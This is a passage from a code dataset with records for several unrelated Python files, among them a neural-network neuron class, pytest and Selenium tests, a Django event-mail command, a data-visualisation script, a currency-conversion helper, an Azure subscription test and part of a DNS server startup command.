[]\n\t\tself.delta \t\t\t\t= 0\n\t\tself.lastKnownInputs \t= []\n\t\tself.lastKnownOutputs\t= []\n\t\tself.numOutputs \t\t= numOutputs\n\t\tself.numInputs \t\t\t= numInputs\n\t\tself.currDerr\t\t\t= 0\n\t\t\n\t\tfor i in range(numInputs):\n\t\t\t#self.weights.append(0.5)\n\t\t\tself.weights.append(r.random())\n\t\t\tself.lastKnownInputs.append(0)\n\t\t#print(self.name,self.weights)\n\t\t\t\n\t\t\t\n\t\t\n\tdef Show(self):\n\t\tprint('\\tNeuron: ', self.name)\n\t\tprint('\\t\\tWeights: ', self.weights )\n\t\tprint('\\t\\tBias: ', self.bias )\n\t\tprint('\\t\\tLearnRate: ', self.learnRate )\n\t\tprint('\\t\\tlastKnownInputs: ', self.lastKnownInputs )\n\t\tprint('\\t\\tlastKnownOutputs: ', self.lastKnownOutputs )\n\t\tprint('\\t\\tCurrent Derrecitive: ', self.currDerr )\n\t\n\t\n\t\n\tdef Check(self, inputs):\n\t\treturn len(inputs) is len(inputs)\n\t\n\t\n\t\n\tdef GetInput(self, inputs):\n\t\tinList = inputs[:]\n\t\tneuronWeightList = self.weights[:]\n\t\tinList.append(1)\n\t\tneuronWeightList.append(self.bias)\n\t\tresult = 0\n\t\tfor idx, i in enumerate(inList):\n\t\t\tresult += i*neuronWeightList[idx]\n\t\treturn result\n\t\n\t\n\tdef Activate(self,inputTotal):\n\t\treturn math.tanh(inputTotal)\t\n\t\n\t\n\tdef FeedForward(self, inputs):\n\t\tresult = 0\n\t\tif not self.Check(inputs):\n\t\t\tprint('Ammount inputs not equal to neuron inputs')\n\t\t\treturn [0]\n\n\t\ttotalInput \t\t\t\t= self.GetInput(inputs)\n\t\tself.lastKnownInputs \t= inputs;\n\t\tresult \t\t\t\t\t= self.Activate(totalInput)\n\t\tself.lastKnownOutputs \t= result\n\t\treturn result\n\t\n\t\n\tdef GetLastKnownInputs(self):\n\t\treturn self.lastKnownInputs\n\t\n\t\n\tdef GetWeights(self):\n\t\tresult = self.weights[:]\n\t\tresult.append(self.bias)\n\t\treturn result\n\t\n\t\n\tdef 
GetDeltaError(self):\n\t\treturn self.delta;\n\t\n\t\n\t\n\tdef GetDericative(self,input):\n\t\td = 1-math.tanh(math.tanh(input))\n\t\tself.currDerr = d\n\t\treturn d\n\t\n\t\n\t\t\n\tdef BackPropagation(self, weight, activated, desiredOutput, inputs):\n\t\tactualOutput \t\t= self.lastKnownOutputs\n\t\ttotInputs \t\t\t= self.GetInput(inputs)\n\t\tdericative \t\t\t= self.GetDericative(totInputs)\n\t\tself.delta \t\t\t= dericative * (desiredOutput - actualOutput)\n\t\tresult = ( weight + (self.learnRate * activated * self.delta) )\n\t\t#print(result,' = ',weight,'+',self.learnRate,'*',activated,'*', self.delta)\n\t\t#print('DeltaK:',self.delta)\n\t\treturn result\n\n\t\t\n\t\t\n\tdef BackPropagation2(self, weight, activation, deltaError ):\n\t\tresult = (weight + self.learnRate * activation * deltaError)\n\t\tself.delta = deltaError\n\t\t#print(result,' = ',weight,'+',self.learnRate,'*',activation,'*', deltaError)\n\t\t#print('Delta(',self.name,'):',self.delta)\n\t\treturn result\n\t\n\t\n\tdef Train(self, inputs, deltaOutput, isOutput = False):\n\t\tif len(self.weights) < len(inputs):\n\t\t\tprint(\"Error: Inputs Not equal to Weight Ammount\")\n\t\t\treturn []\n\t\t\n\t\tself.newWeights = []\n\t\tfor idx, input in enumerate(inputs):\n\t\t\tw = self.weights[idx]\n\t\t\tnewW = 0.5\n\t\t\tif isOutput:\n\t\t\t\tnewW = self.BackPropagation(w, input, deltaOutput, inputs)\n\t\t\telse:\n\t\t\t\tnewW = self.BackPropagation2(w, input, deltaOutput)\n\t\t\t\n\t\t\tself.newWeights.append(newW)\n\t\t\n\t\treturn self.newWeights\n\n\n\tdef UpdateWeights(self):\n\t\tif 'H0' not in self.name:\t\n\t\t\tself.weights = self.newWeights\n\t\t\tself.bias = self.newWeights[-1]\n\t\t\n\t\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Workspace/Neural_Network/Exercise-4_3/Exercise-4_3_C/neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102195773","text":"from morphocut.graph import Node, Input, Output\nimport copy\nimport pytest\n\n\n@Output(\"outp\")\nclass Source(Node):\n def transform(self):\n for i in range(10):\n yield i\n\n\n@Input(\"inp\")\n@Output(\"outp\")\nclass Inner(Node):\n def transform(self, inp):\n return copy.copy(inp)\n\n\n@Input(\"inp\")\n@Output(\"outp1\")\n@Output(\"outp2\")\nclass InnerMultiOut(Node):\n def transform(self, inp):\n return copy.copy(inp)\n\n\n@Input(\"inp1\")\n@Input(\"inp2\")\n@Output(\"outp\")\nclass InnerMultiIn(Node):\n def transform(self, inp1, inp2):\n return copy.copy(inp1)\n\n\n@Input(\"inp\")\nclass Sink(Node):\n def transform(self, inp):\n return None\n\n\ndef test_node():\n source = Source()\n # 1A: bind unambigous node port with *args\n inner = Inner()(source)\n # 1B: bind explicit node port with *args\n inner2 = Inner()(inner.outp)\n # 2A: bind unambigous node port with **kargs\n inner3 = Inner()(inp=inner2)\n # 2B: bind explicit node port with **kargs\n inner4 = Inner()(inp=inner3.outp)\n sink = Sink()(inner4)\n\n # Check the ports\n assert isinstance(inner.inp, Input)\n assert isinstance(inner.outp, Output)\n\n assert inner.inp._node is inner\n assert inner.outp._node is inner\n\n # Unexpected keyword argument\n with pytest.raises(TypeError):\n Inner()(foo=source)\n\n # Ambigous output\n innermulti = InnerMultiOut()(source)\n with pytest.raises(ValueError):\n Inner()(innermulti)\n\n # Predecessors\n assert inner2.get_predecessors() == {inner}\n\n innermultiin = InnerMultiIn()(source, inner)\n 
assert innermultiin.get_predecessors() == {source, inner}\n","sub_path":"tests/graph/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92662052","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.core.mail import EmailMessage\n\nfrom maandagseries.humanpicker.models import Event\nfrom maandagseries.util import parse_date\n\nclass Command(BaseCommand):\n\targs = ''\n\thelp = 'Open an event'\n\n\tdef handle(self, *args, **options):\n\t\tif len(args) != 1:\n\t\t\traise CommandError(\"Usage: openevent %s\" % self.args)\n\t\tev = Event.objects.get(date=parse_date(args[0]))\n\t\tev.open = True\n\t\tev.save()\n\t\tif ev.places > 0:\n\t\t\tmsg = \"Er zijn %d plaatsen. Meld je snel aan op:\\nhttp://maandagseries.quis.cx%s\" % (ev.places, ev.get_absolute_url())\n\t\t\theaders = {'Message-Id': \"<%s@maandagseries.quis.cx>\" % ev.getKey()}\n\t\t\temail = EmailMessage('%s' % ev.date.strftime('%e %b'), msg, 'maandagseries@karpenoktem.nl', ['maandagseries@karpenoktem.nl'], headers=headers)\n\t\t\temail.send()\n","sub_path":"humanpicker/management/commands/openevent.py","file_name":"openevent.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173651430","text":"\"\"\"Observe dataset as raw time series and log-scale spectrogram\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport sys\nimport os\nimport argparse\n\nsys.path.insert(0, os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..')))\n\nimport numpy as np\nfrom scipy.signal import stft\nfrom scipy.ndimage import gaussian_filter\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom torch.utils.data import DataLoader\n\nfrom src.utils.load_cfg import ConfigLoader\nfrom src.factories import DatasetFactory\nfrom src.utils.misc import MiscUtils\n\n\ndef parse_args():\n \"\"\"Parse input arguments\"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-d', '--dataset_cfg', type=str,\n help='Path to the dataset config filename')\n parser.add_argument(\n '-m', '--mode', type=str,\n choices=['train', 'val', 'test'],\n help='mode to load the dataset')\n parser.add_argument(\n '-t', '--lbl_type', type=str, default='all',\n choices=['on_off', 'dyskinesia', 'tremor', 'all'],\n help='Type of label to load to observe. 
`all` means all of them')\n parser.add_argument(\n '-n', '--n_samples', type=int,\n help='Number of observation to visualize')\n parser.add_argument(\n '--min_band', type=float, default=None,\n help='Minimum frequency of the frequency band to plot (in Hz)')\n parser.add_argument(\n '--max_band', type=float, default=None,\n help='Maximum frequency of the frequency band to plot (in Hz)')\n parser.add_argument(\n '-o', '--out_dir', type=str,\n help='Output directory to store the visualizations')\n\n args = parser.parse_args()\n\n if not os.path.isdir(args.out_dir):\n os.makedirs(args.out_dir)\n\n if args.min_band is not None:\n assert args.max_band is not None, 'Both mix_band and max_band must be given'\n if args.max_band is not None:\n assert args.min_band is not None, 'Both mix_band and max_band must be given'\n return args\n\n\ndef parse_labels(lbls, lbl_type):\n \"\"\"Parse the labels for figure title\n\n Args:\n lbls: numpy array if lbl_type is `all`, otherwise a floating point\n lbl_type: label type\n \"\"\"\n if lbl_type != 'all':\n return '{} = {}'.format(lbl_type[0], lbls)\n return 'on_off = {}, dyskinesia = {}, tremor = {}'.format(\n lbls[0], lbls[1], lbls[2])\n\n\ndef viz_time_series(samples, ax):\n \"\"\"Plot the time series measurement\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n ax: axis handle\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n ax.plot(samples[:, j], alpha=0.8, label=names[j])\n\n ax.set_title('Time sequence')\n ax.set_xlabel('n_samples')\n ax.set_ylabel('m/s^2')\n ax.legend()\n ax.set_xlim(0, samples.shape[0])\n\n\ndef viz_gradient(samples, ax, sigma=10):\n \"\"\"Plot the gradient of the measurements\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n ax: axis handle\n sigma: standard deviation of Gaussian filter\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n grad = (np.abs(np.gradient(gaussian_filter(samples[:, j], sigma=sigma))))\n ax.plot(grad, alpha=0.8, label='Gradient '+names[j])\n\n ax.set_title('Gradient')\n ax.set_xlabel('n_samples')\n ax.set_ylabel('m/s^3')\n ax.legend()\n ax.set_xlim(0, samples.shape[0])\n\n\ndef viz_spectrogram(samples, sampling_freq, axes, fig,\n min_band=None, max_band=None):\n \"\"\"Plot the spectrogram in log scale using STFT\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n sampling_freq: sampling frequency of samples\n axes: list of axis handles corresponding to x, y, and z\n fig: figure handle\n min_band: minimum frequency of the frequency band to plot (in Hz)\n max_band: maximum frequency of the frequency band to plot (in Hz)\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n stft_freq, stft_time, stft_resp = stft(samples[:, j], fs=sampling_freq)\n stft_resp = (np.log(np.abs(stft_resp))) # log scale of real part\n\n # Zooming a specific range of frequency if specified\n if (min_band is not None) and (max_band is not None):\n min_idx = int(min_band / sampling_freq * 2 * len(stft_freq))\n max_idx = int(max_band / sampling_freq * 2 * len(stft_freq))\n stft_freq = stft_freq[min_idx: max_idx+1]\n stft_resp = stft_resp[min_idx: max_idx+1, :]\n\n # im_handl = axes[j+1].imshow(stft_resp, origin='lower', aspect='auto')\n # fig.colorbar(im_handl, ax=axes[j+1])\n im_handl = axes[j-1].pcolormesh(stft_time, stft_freq, stft_resp)\n fig.colorbar(im_handl, ax=axes[j-1])\n axes[j-1].grid(False)\n\n axes[j-1].set_title('Log-scale STFT - {}-axis'.format(names[j]))\n 
axes[j-1].set_xlabel('seconds')\n axes[j-1].set_ylabel('Hz')\n\n\ndef viz(loader, args):\n \"\"\"Visualize data\n\n Args:\n loader: initialized data loader\n args: input arguments\n \"\"\"\n # Prepare the environments\n img_dir = os.path.join(args.out_dir, 'imgs')\n if not os.path.isdir(img_dir):\n os.makedirs(img_dir)\n out_fname = os.path.join(args.out_dir, 'viz.html')\n fout = open(out_fname, 'w')\n fmt = '<img src=\"{}\">'\n pbar = MiscUtils.gen_pbar(max_value=args.n_samples, msg='Plotting: ')\n\n # Loop through n_samples and plot\n for i, (samples, labels, msr_ids) in enumerate(loader):\n # Retrieve data\n samples = samples.numpy().squeeze()\n labels = labels.numpy().squeeze()\n n_samples = len(samples)\n duration = samples[-1, 0] - samples[0, 0]\n sampling_freq = 1. * n_samples / duration\n\n # Plot the figure\n fig, axes = plt.subplots(5, 1, figsize=(12, 12), constrained_layout=True)\n\n viz_time_series(samples, axes[0])\n viz_gradient(samples, axes[1])\n viz_spectrogram(samples, sampling_freq, axes[2:5], fig,\n args.min_band, args.max_band)\n fig.suptitle(parse_labels(labels, args.lbl_type))\n\n # Save the figure\n img_fname = os.path.join(img_dir, msr_ids[0]+'.png')\n fig.savefig(img_fname)\n plt.close(fig)\n\n # Add to html\n fout.write(msr_ids[0] + '<br>')\n fout.write('sampling frequency = {}<br>'.format(sampling_freq))\n img_fname = img_fname.replace(args.out_dir, '.')\n fout.write(fmt.format(img_fname))\n fout.write('<br>')\n\n # Update progress\n pbar.update(i+1)\n if i >= args.n_samples-1:\n break\n pbar.finish()\n\n # Close the html file\n fout.close()\n\n\ndef main():\n \"\"\"Main function\"\"\"\n # Load input arguments\n args = parse_args()\n\n # Create dataset and data loader\n dataset_name, dataset_params = ConfigLoader.load_dataset_cfg(args.dataset_cfg)\n\n dataset_factory = DatasetFactory()\n dataset = dataset_factory.generate(\n dataset_name, mode=args.mode, lbl_type=args.lbl_type, **dataset_params)\n\n loader = DataLoader(\n dataset, shuffle=True, drop_last=True, batch_size=1, num_workers=8)\n\n # Visualize\n sns.set()\n viz(loader, args)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"track2-vehicle-reid/src/tools/observe_dataset.py","file_name":"observe_dataset.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"646050981","text":"import numpy as numpy\n\ndef main():\n for i in range(0, 4):\n for j in range(0, 4):\n row = list(\"c({},{}) = \".format(i, j))\n inputs = [\"a\", \"b\"]\n weights = [\"α\", \"β\"]\n for k in range(len(inputs)):\n for p in range(-1, 2):\n for s in range(-1, 2):\n if i + p >= 0 and j + s >= 0:\n row += list(\"{}({},{}){}({},{}) + \".format(weights[k], p, s, inputs[k], i + p, j + s))\n else:\n row += list(\"{}({},{})0 + \".format(weights[k], p, s))\n print(\"\".join(row))\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"test_caffe/system_nn.py","file_name":"system_nn.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"417244896","text":"import sys\nimport os\nimport pytest\n\ntry:\n zbathome = os.environ['ZBAT_HOME']\nexcept:\n print('Test cannot run. Please export ZBAT_HOME.')\n sys.exit()\n\nif zbathome+'lib' not in sys.path:\n sys.path.append(zbathome+'lib')\n \nfrom ui.zbUIGlobalSearch import GlobalSearch\nfrom common.zbCommon import rerunIfFail\nfrom common.zbConfig import NUMBER_RETRIES, DELAY_SECONDS, SCREENSHOT_ON_FAIL\n\n# fixture\n@pytest.fixture(scope=\"module\")\ndef browserGlobalSearch(browser_factory):\n return browser_factory(GlobalSearch)\n\n@pytest.mark.skipif(os.environ[\"NODE_ENV\"] in [\"testing\"], reason=\"Testing doesn't have a functioning global search\") #Testing doesn't have a functioning global search\n@pytest.mark.skipif(os.environ[\"NODE_ENV\"] in [\"staging\"], reason=\"Not enough data\")\n#@pytest.mark.skip(reason=\"Test flaky result. 
Skip until fixed\")\nclass Test_Global_Search:\n\n @pytest.mark.parametrize(\"testid\",[\"C359696\"])\n @pytest.mark.regression \n def test_global_search_devices(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchDevices(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_device.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n @pytest.mark.parametrize(\"testid\",[\"C362797\"])\n @pytest.mark.regression \n def test_global_search_alerts(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchAlerts(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_alerts.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n @pytest.mark.parametrize(\"testid\",[\"C362798\"])\n @pytest.mark.regression\n def test_global_search_results(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchResultPage(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_alerts.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n","sub_path":"tests/ui/test_global_search.py","file_name":"test_global_search.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409885325","text":"import numpy as np \r\n\r\nclass stateActionLog:\r\n def __init__(self, sn, sm, st, action):\r\n self.sn = sn #neighboring neighbors observed by the receiving beacons\r\n self.sm = sm #sum of expected neighbors by the neighboring neighbors\r\n self.st = st #the dissemination rate\r\n\r\n self.action = action #action taken by the beacon\r\n\r\n\r\n\r\nclass costLog:\r\n def __init__(self, cost, state, action, contributedBy):\r\n self.contributedBy = [contributedBy]\r\n self.state = state\r\n self.action = [action] \r\n self.cost = [cost]\r\n self.totalCost = [0, 0]\r\n self.update()\r\n\r\n\r\n def update(self):\r\n self.totalCost = [0, 0]\r\n for i, a in enumerate(self.action):\r\n if a == 0:\r\n self.totalCost[0] += self.cost[i]\r\n elif a == 1:\r\n self.totalCost[1] += self.cost[i]\r\n","sub_path":"beaconEnv/stateActionPairLog.py","file_name":"stateActionPairLog.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640559445","text":"from django.conf.urls import patterns, url\nfrom django.http import HttpResponse\n\nfrom Products import views\n\nurlpatterns = patterns('',\n url(r'^(?P\\d+)/', views.product, name='product'),\n url(r'^Category/(?P\\d+)/', views.category, name='category'),\n url(r'^Add/(?P\\d+)/', views.add_to_cart, name='add'),\n url(r'^Remove/(?P\\d+)/', views.add_to_cart, name='remove'),\n url(r'^Update_Cart/$', views.add_to_cart, name='update'),\n \n)\n\n","sub_path":"MedQuipSite/Products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55627745","text":"# -*- encoding: utf-8 -*-\n\nimport re\n\ncource = {\n 'RUR': 64.98,\n 'UAH': 26.42,\n 'EUR': 0.89,\n 'KZT': 337.47,\n 'USD': 1,\n}\n\n\n\ndef process_comment(comment, **kwargs):\n# def process_comment(comment, 
target_currency,cource,auto_currency=True,source_currency=None,overpay_value=None,overpay_type=None):\n '''\n\n :param comment: comment string\n :param target_currency: currency signature\n :param cource_dict: {'': '\n :param auto: auto detect currqncy\n :param source_currency: currency signature\n :param overpay: overpay float in dollar\n :param overpay_type: 'percent' or 'addition'\n :return: new comment with all replaces\n '''\n\n matches =[\n (re.finditer(r'[\\d]+\\$', comment), 'USD'), # dollar_1 with $\n (re.finditer(r'[\\d]+\\sу\\sе|[\\d]+\\sUSD', comment), 'USD'), # dollar_2 with у е\n (re.finditer(r'[\\d]+\\sГРН|[\\d]+\\sгрн|[\\d]+\\sUAH', comment), 'UAH'), #ГРН грн\n (re.finditer(r'[\\d]+ГР|[\\d]+гр', comment), 'UAH'), #ГР гр\n (re.finditer(r'[\\d]+\\sEUR', comment), 'EUR'),\n (re.finditer(r'[\\d]+\\sKZT', comment), 'KZT'),\n (re.finditer(r'[\\d]+\\sRUR', comment), 'RUR'),\n ]\n\n new_data = compare_matches(comment, matches,\n kwargs['target_currency'],\n kwargs['cource'],\n kwargs['auto_currency'],\n kwargs['overpay_value'],\n kwargs['overpay_type'],\n kwargs['source_currency'])\n\n if not new_data[0]:\n last_match = (re.finditer(r'[\\d]{3}', comment), 'UAH')\n new_comment = compare_matches(comment, [last_match],\n kwargs['target_currency'],\n kwargs['cource'], kwargs['auto_currency'],\n kwargs['overpay_value'],\n kwargs['overpay_type'],\n kwargs['source_currency'])[1]\n else:\n new_comment = new_data[1]\n return new_comment\n\ndef compare_matches(comment, matches,target_cur, cur_dict,auto_currency, overpay_value, overpay_type, source_currency):\n try:\n is_any = False\n for currency_match in matches:\n for match in currency_match[0]:\n if not target_cur:\n target_cur = currency_match[1]\n if auto_currency:\n source_currency = currency_match[1]\n\n text = match.group()\n # print(text)\n value = re.search(r'[\\d]+', text).group()\n # print(cur_dict[source_currency])\n converted = float(value) / cur_dict[source_currency] * cur_dict[target_cur]\n if overpay_value:\n if overpay_type == 'addition':\n converted += overpay_value\n elif overpay_type == 'percent':\n converted += (converted * (overpay_value / 100))\n converted = int(converted)\n if converted < 1: converted += 1\n new_text = '{0} {1}'.format(str(converted), target_cur)\n # print(new_text)\n comment = comment.replace(text, new_text)\n # print(is_any)\n is_any = True\n\n return (is_any, comment)\n except UnboundLocalError:\n msg = 'Price not found in comment %s' % (comment)\n # raise LookupError(msg)\n print(msg)\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462851017","text":"# coding: utf-8\n\n#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\nimport unittest\n\nimport azure.mgmt.billing\nimport azure.mgmt.subscription\nfrom devtools_testutils import AzureMgmtTestCase\n\nclass MgmtSubscriptionTest(AzureMgmtTestCase):\n\n def setUp(self):\n super(MgmtSubscriptionTest, self).setUp()\n self.subscription_client = self.create_basic_client(azure.mgmt.subscription.SubscriptionClient)\n self.billing_client = self.create_mgmt_client(azure.mgmt.billing.BillingManagementClient)\n\n def test_create_subscription(self):\n enrollment_accounts = list(self.billing_client.enrollment_accounts.list())\n self.assertTrue(len(enrollment_accounts) > 0)\n creation_parameters = azure.mgmt.subscription.models.SubscriptionCreationParameters(\n offer_type='MS-AZR-0148P')\n creation_result = self.subscription_client.subscription_factory \\\n .create_subscription_in_enrollment_account(\n enrollment_accounts[0].name,\n creation_parameters)\n self.assertTrue(len(creation_result.result().subscription_link) > 0)\n\n#------------------------------------------------------------------------------\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"azure-mgmt-subscription/tests/test_mgmt_subscription.py","file_name":"test_mgmt_subscription.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637724483","text":"##############################################################################\n#\n# Copyright (c) 2006 Lovely Systems and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Sampledata for the performance test\n\n$Id$\n\"\"\"\n__docformat__ = 'restructuredtext'\n\nimport os\nimport random\n\nfrom zope import interface\nfrom zope import component\nfrom zope import schema\nfrom zope import event\n\nfrom zope.lifecycleevent import ObjectCreatedEvent\n\nfrom z3c.sampledata.interfaces import ISampleDataPlugin\n\nfrom lovely.tag.interfaces import IUserTagging\nfrom lovely.tag.performance import app\n\n\nclass IUrlsSchema(interface.Interface):\n \"\"\"Sample generator for urls with tags.\"\"\"\n\n numUrls = schema.Int(\n title = u'urls',\n description = u'Number or urls to create.',\n default = 100,\n )\n\n\nclass Urls(object):\n interface.implements(ISampleDataPlugin)\n\n dependencies = []\n schema = IUrlsSchema\n\n def generate(self, context, param, dataSource=None, seed=None):\n numUrls = param['numUrls']\n urls = app.UrlContainer()\n event.notify(ObjectCreatedEvent(urls))\n context['urls'] = urls\n dirname = os.path.dirname(__file__)\n self.tags = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n '40000.words')).readlines()]\n self.shorttags = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n '250.words')).readlines()]\n self.domains = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 'domain.txt')).readlines()]\n self.protocol = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 
'protocol.txt')).readlines()]\n self.pre = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 'pre.txt')).readlines()]\n self.rand = random.Random()\n self.rand.seed(seed)\n i = 1\n for urlName in self._urls(numUrls):\n url = app.Url()\n event.notify(ObjectCreatedEvent(url))\n url.url = urlName\n urls['%i'%i] = url\n tagging = IUserTagging(url)\n tagging.tags=self._tags(10)\n i+=1\n return urls\n\n def _tags(self, num, randomLength=True):\n tags = []\n maxRand = len(self.tags)-1\n maxShortRand = len(self.shorttags)-1\n if randomLength:\n num = self.rand.randint(0, num)\n for i in range(num):\n if divmod(i,2)[1]==0:\n tags.append(self.tags[self.rand.randint(0, maxRand)])\n else:\n tags.append(self.shorttags[self.rand.randint(0, maxShortRand)])\n return tags\n\n def _urls(self, num):\n maxTagsRand = len(self.tags)-1\n for i in range(num):\n protocol = self.protocol[self.rand.randint(0, len(self.protocol)-1)]\n pre = self.pre[self.rand.randint(0, len(self.pre)-1)]\n firstPart = self.tags[self.rand.randint(0, maxTagsRand)]\n secondPart = self.tags[self.rand.randint(0, maxTagsRand)]\n domain = self.domains[self.rand.randint(0, len(self.domains)-1)]\n thirdPart = self.tags[self.rand.randint(0, maxTagsRand)]\n forthPart = self.tags[self.rand.randint(0, maxTagsRand)]\n yield u'%s%s.%s.%s/%s/%s.html' %(\n protocol,\n pre,\n firstPart,\n domain,\n thirdPart,\n forthPart,\n )\n\n\nclass IPerformanceTestSiteSamples(interface.Interface):\n \"\"\"Sample generator for the users bookshelfs.\"\"\"\n\n name = schema.TextLine(\n title = u'Name',\n description = u'The name of the site.',\n default = u'Tag Performance'\n )\n\n\nclass PerformanceTestSite(object):\n interface.implements(ISampleDataPlugin)\n\n dependencies = []\n schema = IPerformanceTestSiteSamples\n\n def generate(self, context, param, dataSource=None, seed=None):\n name = param['name']\n testsite = app.PerformanceTestSite()\n event.notify(ObjectCreatedEvent(testsite))\n context[name] = testsite\n return testsite\n","sub_path":"lovely.tag/tags/1.0.0/src/lovely/tag/performance/sampledata.py","file_name":"sampledata.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541920435","text":"import os\nfrom pathlib import Path\nfrom time import sleep\nfrom dnslib.server import DNSServer\nfrom bountydns.core import logger\nfrom bountydns.dns.resolver import Resolver\nfrom bountydns.dns.logger import DNSLogger\nfrom bountydns.dns.handler import DNSHandler\n\nfrom bountydns.cli.commands.base import BaseCommand\nfrom bountydns.dns.api_client import ApiClient\n\n\nclass DnsServer(BaseCommand):\n name = \"dns-server\"\n aliases = [\"dns\"]\n description = \"run dns server\"\n add_log_level = True\n add_debug = True\n\n @classmethod\n def parser(cls, parser):\n parser.add_argument(\n \"-a\",\n \"--api-url\",\n default=\"http://127.0.0.1:8080\",\n action=\"store\",\n help=\"api url\",\n )\n parser.add_argument(\"-t\", \"--api-token\", action=\"store\", help=\"api token\")\n parser.add_argument(\n \"-p\", \"--port\", action=\"store\", type=int, default=53, help=\"listen port\"\n )\n parser.add_argument(\n \"-l\", \"--listen\", action=\"store\", default=\"127.0.0.1\", help=\"bind address\"\n )\n parser.add_argument(\n \"--no-sync\", action=\"store_true\", help=\"sync api token back to database\"\n )\n return parser\n\n async def run(self):\n port = self.get_port()\n listen = self.get_listen()\n\n # TODO: thread issues?\n api_client = 
ApiClient(self.get_api_url(), self.get_api_token())\n\n if not api_client.wait_for_up():\n logger.critical(\"could not connect to api. quitting\")\n self.exit(1)\n\n if self.option(\"no_sync\"):\n logger.info(\"skipping syncing api token\")\n else:\n api_client.sync()\n\n resolver = Resolver(api_client)\n udp_server = DNSServer(\n resolver,\n address=listen,\n port=port,\n handler=DNSHandler,\n logger=DNSLogger(api_client),\n )\n tcp_server = DNSServer(\n resolver,\n address=listen,\n port=port,\n tcp=True,\n handler=DNSHandler,\n logger=DNSLogger(api_client),\n )\n\n logger.info(\"starting DNS server on port %d\", port)\n udp_server.start_thread()\n tcp_server.start_thread()\n\n try:\n while udp_server.isAlive():\n sleep(1)\n except KeyboardInterrupt:\n pass\n\n def get_api_url(self):\n if os.environ.get(\"API_URL\", None):\n return os.environ.get(\"API_URL\")\n return self.option(\"api_url\")\n\n def get_api_token(self):\n if os.environ.get(\"API_TOKEN\", None):\n return os.environ.get(\"API_TOKEN\")\n if self.option(\"api_token\", None):\n return self.option(\"api_token\")\n logger.critical(\"api token required\")\n self.exit(1)\n\n def get_port(self):\n return 